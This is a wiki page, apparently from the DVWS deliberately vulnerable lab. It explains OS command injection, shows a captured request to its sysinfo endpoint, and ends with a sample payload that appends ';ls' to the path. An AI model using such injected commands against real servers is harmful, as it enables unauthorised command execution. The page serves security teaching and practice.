Command Injection

Sam Sanoop edited this page Aug 23, 2020 · 2 revisions

Introduction

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically to fully compromise the application and all its data. It is often seen in web services and APIs that rely on the underlying operating system for additional functionality.

Details

When visiting the Admin area of the DVWS application, the front end calls the API's sysinfo endpoint to obtain system information.

[Screenshot: admin-cmdi]

GET /api/v2/sysinfo/uname HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSIsInVzZXI6YWRtaW4iXSwiaWF0IjoxNTk4MTg5NDA3LCJleHAiOjE1OTgzNjIyMDcsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.9784gQLn2rbCz3W87zs0uxAlyVnQz3r032cpqtU3Yl0
X-Requested-With: XMLHttpRequest
Connection: close

HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: 138
ETag: W/"8a-7ArcDoriYOE/Oa7eYvH3KBp91hY"
Date: Sun, 23 Aug 2020 13:59:10 GMT
Connection: close

"Hostname: Linux snoopy-XPS-15-9570 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"

Arbitrary commands can be injected into this request, e.g. /api/v2/sysinfo/uname;ls
